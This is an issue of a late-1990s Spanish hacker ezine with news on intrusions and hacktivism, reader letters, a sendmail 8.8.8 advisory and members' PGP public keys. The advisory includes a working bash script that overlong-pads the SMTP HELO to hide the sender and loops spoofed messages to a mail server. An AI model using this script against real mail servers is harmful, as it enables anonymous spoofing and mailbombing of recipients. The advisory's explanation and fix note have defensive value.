*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- (Articulo extraido del diario 'El Pais Digital') UNA JUEZ PIDE APOYO AL FBI PARA INVESTIGAR UN ATAQUE INFORMATICO CONTRA EL MINISTERIO DEL INTERIOR (EN ESPAÑA) Los piratas, presumiblemente españoles, actuaron a traves de California para ocultarse. La titular del juzgado de Instruccion numero ocho de Madrid, Rosario Espinosa, ha pedido apoyo a la Oficina Federal de Investigacion de Estados Unidos (FBI) para identificar a quienes atacaron el sistema informatico del Ministerio del Interior entre los dias 6 y 11 de junio. El ataque se efectuo desde ordenadores de la empresa Hotmail, con sede en California, que facilita una direccion de correo electronico sin comprobar la identidad del cliente. Los piratas informaticos cometieron un presunto delito de revelacion de secretos, segun fuentes proximas a la investigacion. La juez ha dirigido una comision rogatoria internacional al FBI para que recabe de la empresa Hotmail los datos necesarios para intentar identificar, lo que resulta muy dificil, a los hackers (piratas informaticos) que atacaron los ordenadores del Ministerio del Interior. Los hackers accedieron a datos de caracter reservado, por lo que las diligencias previas se han abierto por un presunto delito de revelacion de secretos, que el articulo 197 del Codigo Penal castiga con penas de entre uno y cuatro años de prision. La investigacion judicial apunta a una presunta apropiacion o incluso modificacion de ficheros informaticos del Ministerio del Interior. Hotmail Corporation, recientemente adquirida por Microsoft, la firma de Bill Gates, es la principal suministradora mundial de cuentas gratuitas de correo electronico, con unos 10 millones de usuarios. Utilizan sus servicios quienes no quieren pagarse una cuenta de correo o desean guardar el anonimato, pues la compañia facilita a sus clientes la posibilidad de dotarse de una direccion electronica nueva sin verificar la autenticidad de los datos personales que aportan. En su pagina de presentacion en Internet, Hotmail asegura que sigue la politica de "respetar la privacidad de sus socios, excepto si debe quebrantarla por imperativos legales", y que la empresa no se considera responsable "de cualquier dato que resulte, directa o indirectamente, del uso" de sus servicios. Los ordenadores de Interior solo registraron la direccion facilitada por Hotmail al pirata informatico, el equivalente a un apartado de correos. El hecho de que el ataque se lanzase desde Estados Unidos no significa que su autor sea un residente en dicho pais. Mas bien se sospecha que el origen esta en España y que el ordenador norteamericano sirvio de paso intermedio para borrar huellas. Con el objetivo de identificar al agresor, la juez ha pedido al FBI el fichero LOGS en el que se registran las conexiones realizadas durante los dias en que se produjo el ataque con el ordenador de Hotmail donde esta ubicado el correo electronico que empleo el hacker, asi como los numeros IP correspondientes a dichas conexiones. Son los dos rastros informaticos a partir de los cuales es posible, con mucha paciencia y un poco de suerte, ir tirando del hilo y llegar hasta el agresor. El fichero LOGS permitira conocer las operaciones realizadas desde dicho correo electronico y los numeros IP llevaran hasta el servidor de acceso a Internet utilizado por el pirata informatico. Aunque el usuario no tiene siempre el mismo numero IP, la empresa suministradora de acceso a Internet puede localizar que cliente utilizo un numero a una hora concreta. El siguiente paso de la investigacion consistira, por tanto, en saber que usuario de Internet empleo dicho numero IP durante la madrugada del sabado 6 de junio, cuando el ataque informatico contra Interior alcanzo su maxima intensidad. En Estados Unidos, la pirateria informatica constituye una de las principales preocupaciones de la Administracion y de muchas empresas. Las ordenadores del Pentagono, objetivo preferente de los hackers, sufren unos 250.000 intentos de ataque cada año y su portavoz tuvo que reconocer recientemente que un grupo internacional de piratas habia logrado introducirse en el sistema de telecomunicaciones de la Defensa. En España hay menos precedentes ya que, hasta ahora, la investigacion se ha centrado en perseguir la venta de copias ilegales de programas. Sin embargo, la Guardia Civil detuvo en abril pasado a dos empleados de una empresa de Gibraltar y a un profesor de Aviles (Asturias) acusados de formar un grupo denominado Hispahack. Dicho grupo habria accedido a los ordenadores de la NASA, la agencia espacial americana, y al sistema informatico de la Universidad Politecnica de Cataluña, donde fue descubierto. Una de sus travesuras consistio en sustituir por otra la pagina que el Congreso de los Diputados mantiene en Internet. (Articulo extraido del diario 'El Pais Digital') *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- MICROSOFT DEBE PONERSE A DISPOSICION DE LA JUSTICIA El juez Thomas Penfield Jackson ordeno el viernes a Microsoft que Bill Gates y 16 de los mas importantes ejecutivos de la empresa deberan ponerse a disposicion de la justicia para declarar las veces que sean necesarias en el juicio por presuntas actividades monopolicas que se lleva adelante contra el gigante del software. El magistrado tambien le exigio a Microsoft que de a conocer el codigo principal de ciertas versiones de los sistemas operativos Windows 95 y Windows 98. Estos requerimientos se producen tras la propuesta de Microsoft que, alegando que Gates era "un hombre muy ocupado", habia solicitado que el hombre fuerte de la empresa testificara por un maximo de ocho horas en su presentacion del 12 de agosto y que se presentaran en la corte no mas de ocho ejecutivos. Tras las declaraciones del juez Jackson, Microsoft anuncio que acatara el pedido del magistrado aunque tambien lo alerto de que hoy solicitara la desestimacion total del caso, una tactica que para el abogado del gobierno, David Boies, "era previsible". *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- (Articulo de Merce Molist, redactora de 'El Ciber-P@is') HACKERS ESPAÑOLES ATACAN LUGARES CHILENOS La cuenta de correo de la Fundacion Augusto Pinochet y la oficial del citado senador chileno fueron violadas, la semana pasada, por el grupo de hackers Abstraccion, "como protesta por los continuos ataques a intereses españoles en Chile", segun revelaron en una nota enviada a "El Pais". Abstraccion, un grupo hasta ahora desconocido en la escena española, que afirma estar en activo desde hace tres años, descubrio las contraseñas de las dos cuentas y las cambio por "garzon" y "garzon1998", respectivamente, en lo que ellos mismos calificaron de "bromilla": "Sabemos que esto solo les causara una pequeña molestia... pero es el principio". Al cabo de pocas horas, la Fundacion Augusto Pinochet habia solventado el ataque. Otros grupos de hackers españoles se han unido a la causa y han intentado reiterados "mailbombings" (bombardear un servidor con gran cantidad de mensajes de correo) contra intereses chilenos en la red, aunque no han funcionado porque las maquinas estaban preparadas para rechazarlos. Estas acciones se enmarcan dentro del llamado "hacktivismo", la ultima tendencia en el mundo "underground", que consiste en "hackear" por motivos sociales o politicos. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- (Articulo de Merce Molist, redactora de 'El Ciber-P@is') NO FUE UN SUICIDIO El grupo aleman de hackers, Chaos Computer Club, ha hecho publica una nota en la que duda de la hipotesis policial del suicidio para explicar la muerte de uno de sus miembros mas brillantes, apodado "Tron": "Siempre tuvo un caracter abierto y directo y nunca se guardaba los problemas para si mismo. Las circunstacias bajo las que desaparicio y sus extraordinarias capacidades nos han llevado a la conclusion de que ha sido victima de un homicidio". "Tron" era un reconocido experto en sistemas de encriptacion aplicados a las telecomunicaciones. Su ultimo exito habia sido demostrar que las tarjetas alemanas de GSM se podian clonar. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- (Articulo de Merce Molist, redactora de 'El Ciber-P@is') ASALTAN LA UNIVERSIDAD DE LA HIJA DE CLINTON Durante las ultimas tres semanas, un grupo de hackers ha estado espiando impunemente las comunicaciones electronicas de al menos 4.500 alumnos de la Universidad de Stanford. Los piratas, suecos y canadienses, aprovecharon un agujero del sistema para robar las contraseñas de acceso al correo. Se da la casualidad que en esta universidad, conocida por tener un reputado grupo de expertos en seguridad, estudia la hija del presidente norteamericano, Chelsea Clinton. No se ha esclarecido aun si su correo, que cuenta con medidas adicionales de proteccion, tambien fue violado. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- El dia 17 de Diciembre se celebraron unas interesantes jornadas sobre la confiabilidad en Internet. Un miembro de RareGaZz, PaTa, estuvo alli. Se trataron temas tan interesanes como. - Comunicaciones de voz y datos por internet. - Banca y comercio electronico en internet. - Seguridad en Internet. - Firma electronica. Propuesta europea. - Experiencia de Feste como proveedor de servicios de Certificacion. - Las profesiones juridiacs y la seguridad en Internet. Todo esto enfocado hacia la seguridad, fue un nivel asequible sin grandes aspiraciones pero facilmente entedibles por los asistentes. Se metio mucha caña a temas como la firma digital para reconocer la identidad del remitente de mensajes, la criptografia y sus aplicaciones y los certificados digitales. Solo decir que acudi con Chichus, y dimos el cantazo entre los asistentes de mala manera, eramos los unicos que ibamos sin corbata bueno y la periodista que asistio, que si hubiera ido sin ropa no nos hubiera importado. *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ C a r t a s d e l L e c t o r ]──────────────────────────────────────── *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Disculpa, se que lo que pregunto es una estupidez, pero apenas estoy aprendiendo. Donde compilo los archivos en c o que tengo que hacer con ellos? [ Esta es, desgraciadamente, una pregunta muy frecuente. Yo siempre contesto lo mismo: " Se compila en linux y se pone 'cc fichero.c -o fichero' ". Pero no creo que sirva de mucho. Quiero decir, que de que sirve hacerse root con un exploit que no sabes como funciona? es mas .... si ni siquiera sabes como se compila!!! A ver si os vais dando cuenta que eso no es hackear. Para convertiros en verdaderos hackers primero debeis aprender algo de informatica ... un minimo por lo menos. ] *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Desde ya, si les parece bien, podriamos hacer un trato aunque no creo que para uds sea negocio... pero... enseñenme, manden la info que puedan para estos lados y yo me comprometo a ayudar en lo que pueda con el desarrollo de la pagina y la revista... aunque ya deben tener varios ayudantes... de todos modos si pueden manden info... [ Hay gente que opta por suscribirse a la lista de correo e ir aprendiendo poco a poco, preguntando alli sus dudas, o incluso, preguntandonos a nosotros directamente ... Yo hasta ahora he contestado todos mis mails (y si no lo he hecho es porque me fallaria el correo); y estoy seguro de que el resto de miembros de RareGaZz hace lo mismo. Pero hay otra gente que quiere aprender por el camino facil. Quiere que se lo enseñes todo (y cuanto mas rapido y facil mejor) ... pues que sepa ese tipo de gente que yo contesto a todas las dudas (siempre que este dentro de mis posibilidades) pero NUNCA voy a enseñar desde cero y todo lo que se a una persona. Si alguien quiere aprender que estudia y luego pregunte sus dudas, pero que no pida que se le enseñe todo. ] *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ke tal, solo keria saber si siguen por aki xDDD [ Pues claro que si!!!! al pie del cañon, como siempre ... y todo gracias a vosotros. ] *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Hola soy lector de vuestro ezine y me he propuesto seleccionar unos cuantos articulillos de diversas ezines para mi pagina. Me preguntaba si hay problema o pasa algo. [ Cualquiera puede incluir textos nuestros en su web ... siempre que ponga de donde lo saco (por ejemplo: 'texto extraido de RareGaZz - http:// raregazz.acapulco.uagro.mx') ] *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Este bug nos lo envio Mr. AZTECh y es sobre la version 8.8.8 de sendmail: COMMANDO Sendmail SISTEMAS AFECTADOS Sistemas corriendo el sendmail 8.8.8 (y anteriores) y MS Exchange PROBLEMA Michal Zalewski descubrio esto recientemente. Cuando alguien bombardea tu correo, o trata de mandar correo falso, spam, etc - el programa de sendmail adjunta la direccion del host del atacante asi como su direccion en el mensaje que envia. ---- From mail@bomber.gob.mx Mon Jan 5 22:08:21 1998 Received: from salinas (carlitos@almoloya.edu.mx [870.127.24.8]) by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 Date: Mon, 5 Jan 1998 22:07:54 +0100 From: mail@bomber.gob.mx Message-Id: <3.14159665@pi> MAILBOOM!!! ---- Perfecto - Ahora sabes quien es el responsable de esa porqueria molesta en tu correo: "Received: from salinas (carlitos@almoloya.edu.mx [870.127.24.8])". Muy facil no? Pero Zalewski encontro un pequeño agujero, que le permite a un usuario esconder su identidad, y enviar mails anonimamente. Lo unico que debes hacer es sobre pasar la cadena del HELO, que es aproximadamente de 1024 caracteres - la direccion del remitente y otra informacion interesante estara " cortada". Las cabezeras de los mensajes, no contendran informacion interesante. (Pero no siempre seran anonimos si esque se pueden obtener los logs de la maquina que se uso para enviar el mensaje): ---- From mail@bomber.gov.mx Mon Jan 5 22:09:05 1998 Received: from xxxxxxxxxxxxxx... [muchas x (1024 aprox.] ...xxxx Date: Mon, 5 Jan 1998 22:08:52 +0100 From: mail@bomber.gov.mx Message-Id: <3.14159665@pi> MAILBOOM!!! Adivina quien soy? ---- Aqui les pongo un simple ejemplo del uso del agujero del sendmail. Nota este script ha sido escrito solo para demostrar que facil es enviar mails falsos, bombardear correos, con la ayuda del Sendmail. El Script es muuuy lento y esta restringido en muchas formas, pero ayuda a entender bien el problema (Nota, algunos de los daemons no-Berkeley tambien se ven afectados): #!/bin/bash TMPDIR=3D/tmp/`whoami` PLIK=3D$TMPDIR/.safe TIMEOUT=3D2 LIMIT=3D10 MAX=3D20 echo echo "SafeBomb 1.02b -- sendmail HELO hole usage example" echo "Author: Michal Zalewski " echo if [ "$4" =3D "" ]; then echo "USAGE: $0 msgfile address server sender" echo echo " msgfile - file to send as a message body" echo " address - address of lucky recipient" echo " server - outgoing smtp server w/sendmail" echo " sender - introduce yourself" echo echo "WARNING: For educational use ONLY. Mailbombing is illegal." echo "Think twice BEFORE you use this program in any way. Also," echo "I've never said this program is 100% safe nor bug- free." echo sleep 1 exit 0 fi if [ ! -f $1 ]; then echo "Message file not found." echo exit 0 fi echo -n "Preparing message..." mkdir $TMPDIR &>/dev/null chmod 700 $TMPDIR echo "echo \"helo = _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__sa= febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safeb= omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb= __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__s= afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s afebomb__safe= bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe bomb__safebom= b__safebomb__safebomb__safebomb__safebomb__safebomb__safebom b__safebomb__= safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__ safebomb__saf= ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf ebomb__safebo= mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo mb__safebomb_= _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_ _safebomb__sa= febomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa febomb__safeb= omb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb omb__safebomb= __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb __safebomb__s= afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s afebomb__safe= bomb_\"" >$PLIK echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK echo "echo \"rcpt to: $2\"" >>$PLIK echo "echo \"data\"" >>$PLIK echo "cat <<__qniec__" >>$PLIK cat $1 >>$PLIK echo "__qniec__" >>$PLIK echo "echo \".\"" >>$PLIK echo "echo \"quit\"" >>$PLIK echo "sleep $TIMEOUT" >>$PLIK chmod +x $PLIK echo "OK" echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." SENT=3D0 while [ -f $1 ]; do $PLIK|telnet $3 25 &>/dev/null & let SENT=3DSENT+1 echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" CONNECTED=3D`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fi done Este bug a sido confirmado para MS EXCHANGE tambien SOLUCION Este bug fue arreglado en la version 8.8.9 del Sendmail, este limita el tamano del parametro de HELO/EHLO para prevenir que los spammers oculten la informacion de su conexion, la version se encuentra en: ftp://ftp.sendmail.org/pub/sendmail/ *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ L l a v e s P G P ]─────────────────────────────────────────────────────── NOTA: Azumlord tiene nueva llave PGP. Esta que aparece a continuacion es la que vale. Asi que los que tengan la antigua que se la actualicen ... <<::RareGaZz::>> // raregazz@iname.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com> 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 4XwaDg== =crAP -----END PGP PUBLIC KEY BLOCK----- <<::Azumlord::>> // azumlord@iname.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com> mQGiBDZs7KQRBADhZgrMXRignr0B3qj5k8GA7jJ2RpMBV9GuTFDy8UE0EZ02Ipn+ YjALiH8XbOaAkVDvpeCKnRFPNSsfyjYO+LCMkbhhEjPSH7Jcc4OAH9Z8GNXkxkLb cvKVahaGhTePH6HmcHXLXCumrr9CxbVr7gd1MN052jhslqX7enRhD1DGhwCg/zfm AIeYZLsTY1pJplKY9fhBo0cEAMQ4Vm/ElFbm/G/dAUgbzWGTS+eh7/U4IkXj7D/K b/Y1aeju132w+CkuxbGv5tVa9BniCpy2HxFZv10qwpB2doUFCJF8JAPi2mPtVPIP ZQM41KUtmQKagGZODcegSL+i+UAJYioOg8bDbt2ISlK6cjQpiYzuGy5cOGZLpRvs 1LddBACsY8C81guRvjgkeyxoUVJqR4B+T0+pQA62pFrDTIhq5XfcJmpykvKp7Ov2 9yLwf3Ws45iIHSvjPFG44snhZOEZ/UqrCvz5wbtXHOg0oyOzmLCuLeq4s5DPvFnz XioZpJS0ufl822w1oMiDSnG/OtmKcXdF0HP6yUndkrfAmKSE9LQdQXp1bUxvcmQg PGF6dW1sb3JkQGluYW1lLmNvbT6JAEsEEBECAAsFAjZs7KQECwMCAQAKCRAOw9/T 5ajPwb94AKCDWYsAKQ5lLPjpl2Z2OsH5+XIBsgCeOz7dvZiKN9ZjH6W1/y5PItO6 /C65Aw0ENmzsqxAMAMwdd1ckOErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHId OHX79sFzxIMRJitDYMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRP yvMX86RA6dfSd7ZCLQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJX twh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xk hkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58 yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4 DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/ POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlL IhkmuquiXsNV6UwybwACAgv/ebUao4hmXNPfGg3IbLvVtHNWaYrG58GoIZdr/LVg psUW4B5MF71JEmKdtqCW+rB6XZs/YOVu2wzW+P/p2l5vnEJXwEeJiUDe8gp8vbZt RtS8Tv3YSyqiBlMezxHEdLCQIMVdyI9BYjE/RT42v3MWCuov6RFFruDsE8I9x530 /yBbIkr5tF+BTZE6LkweSS7PxRDsZEmFZ1zDAZ21yTrEC/pJNGhrV1rE4/4/3aWu DH8s+P1o5AkMW3RncnOigtX+MpWjCBfK+eGNGw7zp7T604qhymQb2TOLWAvUgDAk WtcZvA8IUEvlY6wbsjE/3TDkow2re+rqGEgsM9R+6SQ8PD7dh4Zt8WOyYfmsytx8 RItchcBDk7atLpyju7pgZdiUULdwTf+CjVZBtWX55+qbJr29qc9TlWjDXWiLFr65 9fZXUx4c9RMLxdGRuw13KntQYnu9LBX4VGECidXU4HZqviE0vViFxmQh3J8vI2JL yA8tmd4lMqnHlWFrNmUKe5z1iQBGBBgRAgAGBQI2bOysAAoJEA7D39PlqM/BNrAA n01IqpjO1Ze5nxQEKdZuYK9LPGyIAKDyVelSYkyK08oE/E10gpv1C6mI6Q== =N+Jt -----END PGP PUBLIC KEY BLOCK----- Cytorax // cytorax@bigfoot.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com> mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0 e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD 95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s =Xw7I -----END PGP PUBLIC KEY BLOCK----- GuyBrush // guybrush@cyberdude.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com> mQGiBDYHhEARBADSZv+eHfn9HidCUXDbXO3T+AXXXZeJJ25CP+6QCMJAnziEbPNP NXBGt1rjnTKsidUSUSrOQCgZ95hP3HC8wXHy55Sq69QPmuJeyDhzZSPJhC6+6pWC CxiN+Qcq9ae+UIA8/NQj7r5os5eMmHSlK4DvEi87eN2vn5TmE7RKEtS/SQCg/8Dc a0gBuCZYxwkCvuc/+iq+N48EAKQ3N4H6PRpbcDn+KcJHStgEp5EyhN7hNv2k10lr 2APTc84Aax6cLV828LpkT4SMNr4jtg303p0WdcVeOJIxy08THow8Rvy1u+IYKgar hrHBeYRFEN88Pa56fpKykeUQmyvMn/wF5vcKnF2vH+paNzoBQJuCaj8QIxxe1ES5 GOUfA/99l/KBtuDb3kUIQ6v2i/cz4R+fHVKCRm1XeEf1vgyQohLrOQ0VkIfV7lJe 9xdlKa57z157eQ+btG785S6FjQsVDDVvdEzv9y9ylCNAgGAik6j/LIsi+JIMSQzW 4R3O//SPQMCFwns91UdtJvQ4810sj3fHnbFE+n4Gb1JRj6N49LQhR3V5QnJ1c2gg PGd1eWJydXNoQGN5YmVyZHVkZS5jb20+iQBLBBARAgALBQI2B4RABAsDAgEACgkQ +2GK9zeXB8G/cwCgsaMg6WojhHO2GPTCroxccNtchX8AoLY92TtMVmWqyXkIMicd d/Q5U3mPuQQNBDYHhEIQEAD5GKB+WgZhekOQldwFbIeG7GHszUUfDtjgo3nGydx6 C6zkP+NGlLYwSlPXfAIWSIC1FeUpmamfB3TT/+OhxZYgTphluNgN7hBdq7YXHFHY UMoiV0MpvpXoVis4eFwL2/hMTdXjqkbM+84X6CqdFGHjhKlP0YOEqHm274+nQ0YI xswdd1ckOErixPDojhNnl06SE2H22+slDhf99pj3yHx5sHIdOHX79sFzxIMRJitD YMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MSHvoPKs4fdIRPyvMX86RA6dfSd7ZC LQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO/CqnS3wy9kJXtwh/CBdyorrWqULz Bej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHT UPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq 01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O 9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcK ctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6z3W FwACAhAAoJeMbD7tViCl2imkbWMIO75M2b+nqeWnXHrzTE/CCxu/IGb7M1MOGKhV 